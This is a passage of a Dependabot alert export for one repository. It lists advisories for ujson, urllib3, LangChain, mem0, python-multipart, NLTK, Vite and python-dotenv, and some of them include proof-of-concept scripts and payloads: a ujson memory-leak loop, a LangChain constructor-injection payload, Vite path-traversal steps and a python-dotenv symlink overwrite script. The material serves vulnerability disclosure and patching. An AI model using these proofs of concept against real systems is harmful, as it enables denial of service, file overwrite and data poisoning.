Early return without cleanup\n \n**Root Cause:**\n\nThe `objToJSONFile()` function allocates a Python string object via `ujson_dumps_internal()`, calls the file's `write()` method, and returns early if `write()` raises an exception—but never calls `Py_DECREF(string)` on the early exit path.\n\n### PoC\n```python\nimport gc, tracemalloc, ujson\n\nclass BadFile:\n def write(self, s):\n raise RuntimeError(\"boom\")\n\nobj = {\"x\": \"A\" * 200000}\n\ndef run():\n try:\n ujson.dump(obj, BadFile())\n except RuntimeError:\n pass\n\nrun()\ntracemalloc.start()\ngc.collect()\nbase = tracemalloc.get_traced_memory()[0]\n\nfor i in range(5):\n run()\n gc.collect()\n cur = tracemalloc.get_traced_memory()[0]\n print(i, cur - base)\n```\n\n### Impact\n\nAny application that serializes data through `ujson.dump()` to an attacker-influenced file-like object that can fail can be driven into linear memory growth. An attacker can quickly use up all the memory of say a web server that sends JSON responses using `ujson.dump()` by repeatedly making requests then closing the connection mid response.\n\n### Remediation\n\nThe missing dec-refs were added in 82af1d0ac01d09aa40c887b460d44b9d9f4bccd9. We recommend upgrading to [UltraJSON 5.12.1](https://github.com/ultrajson/ultrajson/releases/tag/5.12.1).\n\n### Workarounds\n\nReplacing `ujson.dump(obj, file)` with `file.write(ujson.dumps(obj))` is equivalent (contrary to popular misconception, there are no streaming benefits to using `ujson.dump()`) and will avoid the memory leak.","severity":"high","identifiers":[{"value":"GHSA-c38f-wx89-p2xg","type":"GHSA"},{"value":"CVE-2026-44660","type":"CVE"}],"references":[{"url":"https://github.com/ultrajson/ultrajson/security/advisories/GHSA-c38f-wx89-p2xg"},{"url":"https://github.com/ultrajson/ultrajson/commit/82af1d0ac01d09aa40c887b460d44b9d9f4bccd9"},{"url":"https://github.com/ultrajson/ultrajson/releases/tag/5.12.1"},{"url":"https://github.com/advisories/GHSA-c38f-wx89-p2xg"}],"published_at":"2026-05-12T22:25:11Z","updated_at":"2026-05-12T22:25:12Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":"<= 5.12.0","first_patched_version":{"identifier":"5.12.1"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","score":8.7}},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-401","name":"Missing Release of Memory after Effective Lifetime"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":"<= 5.12.0","first_patched_version":{"identifier":"5.12.1"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/64","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/64","created_at":"2026-05-13T03:39:13Z","updated_at":"2026-05-13T05:27:11Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:11Z","auto_dismissed_at":null},{"number":63,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"urllib3"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-qccp-gfcp-xxvc","cve_id":"CVE-2026-44431","summary":"urllib3: Sensitive headers forwarded across origins in proxied low-level redirects","description":"### Impact\n\nWhen following cross-origin redirects for requests made using urllib3’s high-level APIs, such as `urllib3.request()`, `PoolManager.request()`, and `ProxyManager.request()`, sensitive headers — `Authorization`, `Cookie`, and `Proxy-Authorization` (defined in `Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT`) — are stripped by default, as expected.\n\nHowever, cross-origin redirects followed from the low-level API via `ProxyManager.connection_from_url().urlopen(..., assert_same_host=False)` still forward these sensitive headers.\n\n### Affected usage\n\nApplications and libraries using urllib3 versions earlier than 2.7.0 may be affected if they allow cross-origin redirects while making requests through `HTTPConnection.urlopen()` instances created via `ProxyManager.connection_from_url()`.\n\n### Remediation\n\nUpgrade to urllib3 version 2.7.0 or later, in which sensitive headers are stripped from redirects followed by `HTTPConnection`.\n\nIf upgrading is not immediately possible, avoid using this low-level redirect flow for cross-origin redirects. If appropriate for your use case, switch to `ProxyManager.request()`.","severity":"high","identifiers":[{"value":"GHSA-qccp-gfcp-xxvc","type":"GHSA"},{"value":"CVE-2026-44431","type":"CVE"}],"references":[{"url":"https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc"},{"url":"https://github.com/advisories/GHSA-qccp-gfcp-xxvc"}],"published_at":"2026-05-11T14:51:20Z","updated_at":"2026-05-11T14:51:22Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.23, < 2.7.0","first_patched_version":{"identifier":"2.7.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N","score":8.2}},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-200","name":"Exposure of Sensitive Information to an Unauthorized Actor"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.23, < 2.7.0","first_patched_version":{"identifier":"2.7.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/63","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/63","created_at":"2026-05-12T10:55:55Z","updated_at":"2026-05-13T05:27:11Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:11Z","auto_dismissed_at":null},{"number":62,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"langchain-core"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-pjwx-r37v-7724","cve_id":"CVE-2026-44843","summary":"LangChain vulnerable to unsafe deserialization of attacker-controlled objects through overly broad `load()` allowlists","description":"LangChain contains older runtime code paths that deserialize run inputs, run outputs, or other application-controlled payloads using overly broad object allowlists. These paths may call `load()` with `allowed_objects=\"all\"`. This does not enable arbitrary Python object deserialization, but it does allow any trusted LangChain-serializable object to be revived, which is broader than these runtime paths require. As a result, attacker-supplied LangChain serialized constructor dictionaries may cause trusted runtime paths to instantiate classes with untrusted constructor arguments.\n\nApplications are exposed only when all of the following are true:\n\n1. The application accepts untrusted structured input, such as JSON, from a user or network request.\n2. The application does not validate or canonicalize that input into an inert schema before invoking LangChain.\n3. Attacker-controlled nested dictionaries or lists are preserved in LangChain run inputs or outputs.\n4. The application uses an affected API path that later deserializes that run data.\n\nKnown affected runtime surfaces include:\n\n- `RunnableWithMessageHistory`\n- `astream_log()`\n- `astream_events(version=\"v1\")`\n\nRelated unsafe deserialization patterns may also affect applications that explicitly load serialized LangChain prompt or runnable objects from untrusted sources, including shared prompt stores, Hub artifacts with model configuration, or other application-controlled serialization stores.\n\nApplications that validate incoming requests against a fixed schema, such as coercing user input to a plain string or message-content field before invoking LangChain, are unlikely to expose this deserialization primitive.\n\nThis release also fixes a related secret-marker validation bypass in the serialization and deserialization layer (`_is_lc_secret`). That issue creates an additional path by which attacker-controlled constructor dictionaries can avoid escaping during `dumps()` -> `loads()` round-trips and reach LangChain object revival logic.\n\n## Impact\n\nAn attacker who can submit untrusted structured input to an affected application, and have that structure preserved in LangChain run data, may be able to inject LangChain serialized constructor payloads such as:\n\n```json\n{\n \"lc\": 1,\n \"type\": \"constructor\",\n \"id\": [\"langchain_core\", \"messages\", \"ai\", \"AIMessage\"],\n \"kwargs\": {\"content\": \"attacker-controlled content\"}\n}\n```\n\nIf this payload reaches a broad `load()` call, LangChain may instantiate the referenced class instead of treating the payload as inert user data.\n\nRealistic impacts include:\n\n- Persistent chat-history poisoning when revived `AIMessage`, `HumanMessage`, or `SystemMessage` objects are stored by `RunnableWithMessageHistory`.\n- Prompt injection or behavior manipulation if attacker-controlled messages are later included in model context.\n- Instantiation of unexpected trusted LangChain objects with attacker-controlled constructor arguments.\n- Possible credential disclosure or server-side requests if a reachable object reads environment credentials, creates clients, or contacts attacker-controlled endpoints during initialization.\n- Additional prompt-template or runnable-configuration impacts in applications that separately load and execute untrusted serialized LangChain objects.\n\n## Remediation\n\nLangChain will deprecate the affected APIs as part of this fix:\n\n- `RunnableWithMessageHistory`\n- `astream_log()`\n- `astream_events(version=\"v1\")`\n\nThese are older code paths that are no longer recommended for new applications. They were not previously marked as deprecated, but recent LangChain documentation has primarily directed users toward newer streaming and memory patterns, including the `stream` API. Applications should migrate to the currently recommended APIs rather than continue depending on these older surfaces.\n\nSeparately, LangChain will update `load()` and `loads()` to tighten deserialization behavior so broad object revival is not applied implicitly to untrusted or application-controlled payloads. The older runtime surfaces listed above are being deprecated rather than preserved as supported paths for broad runtime deserialization.\n\nThis release also fixes a related secret-marker validation bypass in the serialization and deserialization layer (`_is_lc_secret`). That issue creates an additional path by which attacker-controlled constructor dictionaries can avoid escaping during `dumps()` -> `loads()` round-trips and reach LangChain object revival logic.\n\n## Guidance for `load()` and `loads()`\n\n`load()` and `loads()` should be used only with trusted LangChain manifests or serialized objects from trusted storage. Do not pass user-controlled data to `load()` or `loads()`, and do not use them as general parsers for request bodies, tool inputs, chat messages, or other attacker-controlled data.\n\n`load()` and `loads()` are beta APIs, and their behavior may change as LangChain narrows unsafe defaults. Future LangChain versions will require callers to be explicit about which objects may be revived. Users should pass a narrow `allowed_objects` value appropriate for the specific trusted manifest they are loading, rather than relying on broad defaults or `allowed_objects=\"all\"`, which permits the full trusted LangChain serialization allowlist.\n\n## Credits\n\nThe original issue was first reported by @u-ktdi.\n\nSimilar findings were reported by @dewankpant, @shrutilohani, @Moaaz-0x, @pucagit.\n\nA related `_is_lc_secret` marker bypass affecting `dumps()` -> `loads()` round-trips was reported by @yardenporat353 (and a similar report by @localhost-detect)","severity":"high","identifiers":[{"value":"GHSA-pjwx-r37v-7724","type":"GHSA"},{"value":"CVE-2026-44843","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-pjwx-r37v-7724"},{"url":"https://github.com/advisories/GHSA-pjwx-r37v-7724"}],"published_at":"2026-05-08T23:07:32Z","updated_at":"2026-05-08T23:07:34Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"high","vulnerable_version_range":">= 1.0.0, <= 1.3.2","first_patched_version":{"identifier":"1.3.3"}},{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"high","vulnerable_version_range":"<= 0.3.84","first_patched_version":{"identifier":"0.3.85"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N","score":8.2},"cvss_v4":{"vector_string":null,"score":0.0}},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N","score":8.2},"cwes":[{"cwe_id":"CWE-502","name":"Deserialization of Untrusted Data"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"high","vulnerable_version_range":">= 1.0.0, <= 1.3.2","first_patched_version":{"identifier":"1.3.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/62","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/62","created_at":"2026-05-08T23:09:36Z","updated_at":"2026-05-13T05:27:10Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:10Z","auto_dismissed_at":null},{"number":61,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"mem0ai"},"manifest_path":"methods/evermemos/uv.lock","scope":"development","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-xqxw-r767-67m7","cve_id":"CVE-2026-7597","summary":"mem0ai mem0 has an Improper Input Validation Issue","description":"A vulnerability was found in mem0ai mem0 up to 1.0.11. This affects the function pickle.load/pickle.dump of the file mem0/vector_stores/faiss.py. Performing a manipulation results in deserialization. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The patch is named 62dca096f9236010ca15fea9ba369ba740b86b7a. Applying a patch is the recommended action to fix this issue.","severity":"low","identifiers":[{"value":"GHSA-xqxw-r767-67m7","type":"GHSA"},{"value":"CVE-2026-7597","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-7597"},{"url":"https://github.com/mem0ai/mem0/issues/3778"},{"url":"https://github.com/mem0ai/mem0/pull/4833"},{"url":"https://github.com/mem0ai/mem0/commit/62dca096f9236010ca15fea9ba369ba740b86b7a"},{"url":"https://github.com/mem0ai/mem0"},{"url":"https://vuldb.com/submit/805562"},{"url":"https://vuldb.com/vuln/360550"},{"url":"https://vuldb.com/vuln/360550/cti"},{"url":"https://github.com/advisories/GHSA-xqxw-r767-67m7"}],"published_at":"2026-05-02T00:31:21Z","updated_at":"2026-05-07T20:47:22Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"mem0ai"},"severity":"low","vulnerable_version_range":"< 2.0.0b2","first_patched_version":{"identifier":"2.0.0b2"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L","score":6.3},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P","score":2.1}},"epss":{"percentage":0.00058,"percentile":0.17791},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L","score":6.3},"cwes":[{"cwe_id":"CWE-20","name":"Improper Input Validation"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"mem0ai"},"severity":"low","vulnerable_version_range":"< 2.0.0b2","first_patched_version":{"identifier":"2.0.0b2"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/61","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/61","created_at":"2026-05-08T13:18:43Z","updated_at":"2026-05-13T05:27:10Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:10Z","auto_dismissed_at":null},{"number":60,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"python-multipart"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-pp6c-gr5w-3c5g","cve_id":"CVE-2026-42561","summary":"python-multipart has Denial of Service via unbounded multipart part headers","description":"### Summary\n\n`python-multipart` has a denial of service vulnerability in multipart part header parsing. When parsing `multipart/form-data`, `MultipartParser` previously had no limit on the number of part headers or the size of an individual part header. An attacker could send a request with either many repeated headers without terminating the header block or a single very large header value, causing excessive CPU work before request rejection or completion.\n\n### Impact\n\nApplications that parse attacker-controlled `multipart/form-data` with affected versions of `python-multipart` can experience CPU exhaustion. ASGI applications using Starlette, FastAPI, or other frameworks that invoke `python-multipart` may have worker or event-loop delays while processing malicious upload requests.\n\n### Details\n\nThe affected parser states are `HEADER_FIELD_START`, `HEADER_FIELD`, `HEADER_VALUE_START`, `HEADER_VALUE`, and `HEADER_VALUE_ALMOST_DONE`. The issue can be triggered by:\n\n- A multipart part with an oversized individual header value.\n- A multipart part with many repeated header lines or an unterminated header block.\n\nBoth variants are addressed by enforcing default parser limits for maximum header count and maximum header size.\n\n### Mitigation\n\nUpgrade to `python-multipart` `0.0.27` or later.\n\nIf upgrading is not immediately possible, reduce exposure by enforcing request body size limits at the server, proxy, or framework layer. This is only a mitigation; affected versions of `python-multipart` still parse multipart part headers without the default header count and header size limits.","severity":"high","identifiers":[{"value":"GHSA-pp6c-gr5w-3c5g","type":"GHSA"},{"value":"CVE-2026-42561","type":"CVE"}],"references":[{"url":"https://github.com/Kludex/python-multipart/security/advisories/GHSA-pp6c-gr5w-3c5g"},{"url":"https://github.com/advisories/GHSA-pp6c-gr5w-3c5g"}],"published_at":"2026-05-06T21:56:14Z","updated_at":"2026-05-06T21:56:16Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"high","vulnerable_version_range":"< 0.0.27","first_patched_version":{"identifier":"0.0.27"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"high","vulnerable_version_range":"< 0.0.27","first_patched_version":{"identifier":"0.0.27"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/60","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/60","created_at":"2026-05-08T09:35:23Z","updated_at":"2026-05-13T05:27:10Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:10Z","auto_dismissed_at":null},{"number":59,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-68j8-pq59-fqgm","cve_id":"CVE-2026-0847","summary":"NLTK has a Path Traversal issue","description":"A vulnerability in NLTK versions up to and including 3.9.2 allows arbitrary file read via path traversal in multiple CorpusReader classes, including WordListCorpusReader, TaggedCorpusReader, and BracketParseCorpusReader. These classes fail to properly sanitize or validate file paths, enabling attackers to traverse directories and access sensitive files on the server. This issue is particularly critical in scenarios where user-controlled file inputs are processed, such as in machine learning APIs, chatbots, or NLP pipelines. Exploitation of this vulnerability can lead to unauthorized access to sensitive files, including system files, SSH private keys, and API tokens, and may potentially escalate to remote code execution when combined with other vulnerabilities.","severity":"high","identifiers":[{"value":"GHSA-68j8-pq59-fqgm","type":"GHSA"},{"value":"CVE-2026-0847","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-0847"},{"url":"https://huntr.com/bounties/fc69914f-36a9-4c18-8503-10013b39f966"},{"url":"https://github.com/advisories/GHSA-68j8-pq59-fqgm"}],"published_at":"2026-03-04T21:32:45Z","updated_at":"2026-05-06T19:18:18Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 3.9.2","first_patched_version":null}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L","score":8.6},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.0008,"percentile":0.23316},"cvss":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L","score":8.6},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 3.9.2","first_patched_version":null},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/59","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/59","created_at":"2026-05-08T07:46:01Z","updated_at":"2026-05-13T05:27:10Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:10Z","auto_dismissed_at":null},{"number":58,"state":"open","dependency":{"package":{"ecosystem":"npm","name":"vite"},"manifest_path":"use-cases/game-of-throne-demo/frontend/package.json","scope":"development","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-4w7w-66w2-5vf9","cve_id":"CVE-2026-39365","summary":"Vite Vulnerable to Path Traversal in Optimized Deps `.map` Handling","description":"### Summary\n\nAny files ending with `.map` even out side the project can be returned to the browser.\n\n### Impact\n\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host))\n- have a sensitive content in files ending with `.map` and the path is predictable\n\n### Details\n\nIn Vite v7.3.1, the dev server’s handling of `.map` requests for optimized dependencies resolves file paths and calls `readFile` without restricting `../` segments in the URL. As a result, it is possible to bypass the [`server.fs.strict`](https://vite.dev/config/server-options#server-fs-strict) allow list and retrieve `.map` files located outside the project root, provided they can be parsed as valid source map JSON.\n\n### PoC\n1. Create a minimal PoC sourcemap outside the project root\n ```bash\n cat > /tmp/poc.map <<'EOF'\n {\"version\":3,\"file\":\"x.js\",\"sources\":[],\"names\":[],\"mappings\":\"\"}\n EOF\n ```\n2. Start the Vite dev server (example)\n ```bash\n pnpm -C playground/fs-serve dev --host 127.0.0.1 --port 18080\n ```\n3. Confirm that direct `/@fs` access is blocked by `strict` (returns 403)\n ![\"image\"](\"https://github.com/user-attachments/assets/15a859a8-1dc6-4105-8d58-80527c0dd9ab\")
\n4. Inject `../` segments under the optimized deps `.map` URL prefix to reach `/tmp/poc.map`\n ![\"image\"](\"https://github.com/user-attachments/assets/5d02957d-2e6a-4c45-9819-3f024e0e81f2\")
","severity":"medium","identifiers":[{"value":"GHSA-4w7w-66w2-5vf9","type":"GHSA"},{"value":"CVE-2026-39365","type":"CVE"}],"references":[{"url":"https://github.com/vitejs/vite/security/advisories/GHSA-4w7w-66w2-5vf9"},{"url":"https://github.com/vitejs/vite/pull/22161"},{"url":"https://github.com/vitejs/vite/commit/79f002f2286c03c88c7b74c511c7f9fc6dc46694"},{"url":"https://github.com/vitejs/vite/releases/tag/v6.4.2"},{"url":"https://github.com/vitejs/vite/releases/tag/v7.3.2"},{"url":"https://github.com/vitejs/vite/releases/tag/v8.0.5"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39365"},{"url":"https://github.com/advisories/GHSA-4w7w-66w2-5vf9"}],"published_at":"2026-04-06T18:03:46Z","updated_at":"2026-04-07T22:16:29Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"npm","name":"vite"},"severity":"medium","vulnerable_version_range":">= 8.0.0, <= 8.0.4","first_patched_version":{"identifier":"8.0.5"}},{"package":{"ecosystem":"npm","name":"vite"},"severity":"medium","vulnerable_version_range":">= 7.0.0, <= 7.3.1","first_patched_version":{"identifier":"7.3.2"}},{"package":{"ecosystem":"npm","name":"vite"},"severity":"medium","vulnerable_version_range":"<= 6.4.1","first_patched_version":{"identifier":"6.4.2"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N","score":6.3}},"epss":{"percentage":0.01253,"percentile":0.79481},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"},{"cwe_id":"CWE-200","name":"Exposure of Sensitive Information to an Unauthorized Actor"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"npm","name":"vite"},"severity":"medium","vulnerable_version_range":"<= 6.4.1","first_patched_version":{"identifier":"6.4.2"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/58","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/58","created_at":"2026-04-30T08:37:38Z","updated_at":"2026-04-30T08:37:38Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":57,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"python-dotenv"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-mf9w-mj56-hr94","cve_id":"CVE-2026-28684","summary":"python-dotenv: Symlink following in set_key allows arbitrary file overwrite via cross-device rename fallback","description":"### Summary\n\n`set_key()` and `unset_key()` in python-dotenv follow symbolic links when rewriting `.env` files, allowing a local attacker to overwrite arbitrary files via a crafted symlink when a cross-device rename fallback is triggered.\n\n\n### Details\n\nThe `rewrite()` context manager in `dotenv/main.py` is used by both `set_key()` and `unset_key()` to safely modify `.env` files. It works by writing to a temporary file (created in the system's default temp directory, typically `/tmp`) and then using `shutil.move()` to replace the original file.\n\nWhen the `.env` path is a symbolic link and the temp directory resides on a different filesystem than the target (a common configuration on Linux systems using tmpfs for `/tmp`), the following sequence occurs:\n\n1. `shutil.move()` first attempts `os.rename()`, which fails with an `OSError` because atomic renames cannot cross device boundaries.\n2. On failure, `shutil.move()` falls back to `shutil.copy2()` followed by `os.unlink()`.\n3. `shutil.copy2()` calls `shutil.copyfile()` with `follow_symlinks=True` by default.\n4. This causes the content to be written to the **symlink target** rather than replacing the symlink itself.\n\nAn attacker who has write access to the directory containing a `.env` file can pre-place a symlink pointing to any file that the application process has write access to. When the application (or a privileged process such as a deploy script, Docker entrypoint, or CI pipeline) calls `set_key()` or `unset_key()`, the symlink target is overwritten with the new `.env` content.\n\nThis vulnerability does not require a race condition and is fully deterministic once the preconditions are met.\n\n### Impact\nThe primary impacts are to **integrity** and **availability**:\n\n- **File overwrite / destruction (DoS):** An attacker can cause an application or privileged process to corrupt or destroy configuration files, database configs, or other sensitive files it would not normally have access to modify.\n- **Integrity violation:** The target file's original content is replaced with `.env`-formatted content controlled by the attacker.\n- **Potential privilege escalation:** In scenarios where a privileged process (running as root or a service account) calls `set_key()`, the attacker can leverage this to write to files beyond their own access level.\n\nThe scope of impact depends on the application using python-dotenv and the privileges under which it runs.\n\n\n### Proof of Concept\n\nThe following script demonstrates the vulnerability. It requires `/tmp` and the user's home directory to reside on different devices (common on systemd-based Linux systems with tmpfs).\n\n```python\nimport os\nimport sys\nimport tempfile\nfrom dotenv import set_key\n\n# Pre-condition: /tmp must be on a different device than the target directory.\ntmp_dev = os.stat(\"/tmp\").st_dev\nhome_dev = os.stat(os.path.expanduser(\"~\")).st_dev\nassert tmp_dev != home_dev, \"Skipped: /tmp and ~ are on the same device (no cross-device move)\"\n\nwith tempfile.TemporaryDirectory(dir=os.path.expanduser(\"~\")) as workdir:\n # File an attacker wants to overwrite\n target = os.path.join(workdir, \"victim_config.txt\")\n with open(target, \"w\") as f:\n f.write(\"DB_PASSWORD=supersecret\\n\")\n\n # Attacker pre-places a symlink at the path the application will use as .env\n env_symlink = os.path.join(workdir, \".env\")\n os.symlink(target, env_symlink)\n\n before = open(target).read()\n\n # Application writes a new key -- triggers the cross-device fallback\n set_key(env_symlink, \"INJECTED\", \"attacker_value\")\n\n after = open(target).read()\n\n print(\"Before:\", repr(before))\n print(\"After: \", repr(after))\n print(\"Symlink target overwritten:\", target)\n```\n\n**Expected output:**\n```\nBefore: 'DB_PASSWORD=supersecret\\n'\nAfter: \"DB_PASSWORD=supersecret\\nINJECTED='attacker_value'\\n\"\nSymlink target overwritten: /home/user/tmp806nut2g/victim_config.txt\n```\n\n### Remediation\n\nThe fix changes the `rewrite()` context manager in the following ways:\n\n1. **Symlinks are no longer followed by default.** When the `.env` path is a symlink, `rewrite()` now resolves it to the real path before proceeding, or (by default) operates on the symlink entry itself rather than the target.\n2. **A `follow_symlinks: bool = False` parameter** is added to `set_key()` and `unset_key()` for users who explicitly need the old behavior.\n3. **Temp files are written in the same directory** as the target `.env` file (instead of the system temp directory), eliminating the cross-device rename condition entirely.\n4. **`os.replace()` is used instead of `shutil.move()`**, providing atomic replacement without symlink-following fallback behavior.\n\nUsers are advised to upgrade to the patched version as soon as it is available on PyPI.\n\n### Timeline\n\n| Date | Event |\n| ------------ | ---------------------------------------------------------------------------------------------------- |\n| 2026-01-09 | Initial report received from Giorgos Tsigourakos regarding a separate, unrelated issue also located in `rewrite()` |\n| 2026-01-10 | Co-maintainer acknowledged report, requested clarification |\n| 2026-01-11 | Initial report assessed as not exploitable and closed |\n| 2026-02-24 | Reporter identified new, distinct cross-device symlink attack vector with deterministic exploitation |\n| 2026-02-26 | Co-maintainer confirmed vulnerability and shared draft patch |\n| 2026-02-26 | Reporter validated fix with monkeypatched PoC, proposed CVSS |\n| 2026-03-01 | Patch merged to main |\n| 2026-03-01 | Patched version released to PyPI |\n| 2026-04-20 | Advisory published |\n\n### Patches\n\nUpgrade to v.1.2.2 or use the patch from 